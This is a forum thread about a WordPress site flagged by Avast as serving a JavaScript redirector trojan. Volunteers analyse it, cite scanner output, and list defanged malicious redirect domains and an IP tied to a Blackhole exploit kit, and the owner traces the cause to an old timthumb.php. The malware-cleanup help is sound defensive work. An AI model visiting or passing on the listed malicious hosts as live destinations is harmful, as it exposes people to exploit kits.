js:Redirector-NT [Trj] trojan problem with Wordpress

Hi everyone,

When i try to enter my website (hxxp://hotmobilepress.com), its giving js:Redirector-NT [Trj] alert from Avast.

I download whole site from FTP server and scan with Avast and Ad-Aware, but nothing found :frowning:
I checked my database file for any redirect address, but nothing found :frowning:

Also Sucuri report is clean too…

But Avast still giving js:Redirector-NT [Trj] alerts…

What can i do for remove this trojan from my website?

PS: I think its because my easy SQL database password. If you have same problem check your database password if it strong enough…

also kaspersky detect
https://www.virustotal.com/file/6f4f647cee08df0cbbd1567cbc2bc886d5e97ad9fdfd785e3bb5dc3cc25e28c4/analysis/1328594043/

Same problem here:

hxxp://linky.es

the avast alert occurs randomly, maybe one time each 10 times I go to the web… usually when I go to the web first time in a few hours. Then I try to refresh and nothing. I have downloaded the home page when alert occurs, but not difference with the home page when nothing occurs.

Yes, alerts ccours randomly…

Still there is no solution…

Hey! King Polonus :slight_smile:

I’m waiting for your advices…

@luinwe there is no detection today
https://www.virustotal.com/file/3e41001417bb1a03984177cde4cb57c619632be344ddf9e24eb1f260e6507686/analysis/1328650188/

@weblanzarote no detection here
https://www.virustotal.com/file/4dcda4c11ba5d507022a56f8ba288d2afd39758e9418ae1ece03c326e5b6e31f/analysis/1328650253/

I just ran virustotal check…

https://www.virustotal.com/url/6f862765b29f8e568b7a71577372d7c8776974ba52b9a1d0ab37843ac35ffa1a/analysis/1328651337/

What should i do?

Redirecting addresses are;

hxxp://piz.de.tf/in.cgi?2
hxxp://gone.jp.mn/in.cgi?2

This script appears to point to a site that is blocked by the network shield. This is most likely the result of the alert.

If you look at the script, you can see a link that is pieced together.

There are a couple of threads about this particular detection at the moment…with different sites.

Wow! Which file/files should i look at for this script?

Hi luinwe,

The general method of insfection can be achieved from what spg SCOTT gave on the other site mentioned in this thread.

The only issue I spot through the generic JS unpacker is this part of the code here for -hotmobilepress dot com is:
Your Wordpress should be updated and patched here: Wordpress internal path: /home/hotmobil/public_html/wp-content/themes/LondonLive/index.php (sucuri alert for that theme)
-hotmobilepress.com/wp-content/themes/LondonLive/scripts/js/jquery-ui.min.js?ver=3.3.1 suspicious
[suspicious:2] (ipaddr:46.28.239.195) (script) -hotmobilepress.com/wp-content/themes/LondonLive/scripts/js/jquery-ui.min.js?ver=3.3.1
status: (referer=-hotmobilepress.com/)saved 183557 bytes fe810f47883364fbc4dc2c61e03a3aca0f74fed7
info: [iframe] -hotmobilepress.com/wp-content/themes/LondonLive/scripts/js/javascript:false;
info: [decodingLevel=0] found JavaScript
error: undefined variable jQuery
error: undefined variable $.fn
error: line:1: SyntaxError: missing ; before statement:
error: line:1: var $.fn = 1;
error: line:1: …^
suspicious

Avast shield does not alert, but the site is still given as suspicious here: http://urlquery.net/report.php?id=19657

For the redirect (it could be non-responsive now). see: http://demon117sec.blogspot.com/2012_02_01_archive.html (link author = Paul from demon177)
That is a redirect to blackhole exploit kit malware…

polonus

That script is on the home page, on line 31 of the source.

Thank you but i cant find this script code anywhere at my index.php, footer.php, header.php and others…

I have just had another look at the page, and it appears as though the script has been removed. Have you changed anything?

Nop, i didnt change anything.

And i cant understand why sucuri giving to this red alert for my index.php file? There is no explanation… My wordpress version is 3.3.1.

I am not sure on that one. 3.3.1 is the most recent version according to wordpress.org

Well the sucuri alert is not for an outdated WordPress version, the alerts is foir that specific theme: wordpress London live theme

Use the Wordpress exploit scanner: http://wordpress.org/extend/plugins/exploit-scanner/
This plugin is far from perfect, so you might have to plough through the code for changes yourself,
You fell victim to a php hack so you have to secure the use of that first,

polonus

Thank you so much guys… spg SCOTT and polonus… you are great!

I found the problem. It was old timthumb.php file!!!

Exploit Scanner show me all of infected files and now everything is ok with my website…

You’re welcome :slight_smile:

That is interesting, the timthumb vulnerability again…saw that a while ago with slightly different script infections…

Scott

Well look here: http://urlquery.net/report.php?id=19989
Site is not beyond suspicion to be a phishing site, and re-directs to cellphonetesters dot com
with undefined variable Bootloader found
http://forums.malwarebytes.org/index.php?showtopic=105879 defined there as a scam site,
See the bizimbal report: http://www.bizimbal.com/odb/details.html?id=935134

polonus

I am having the exact same problem, exactly what files was infected? Could you please paste their names.

Regards
Rick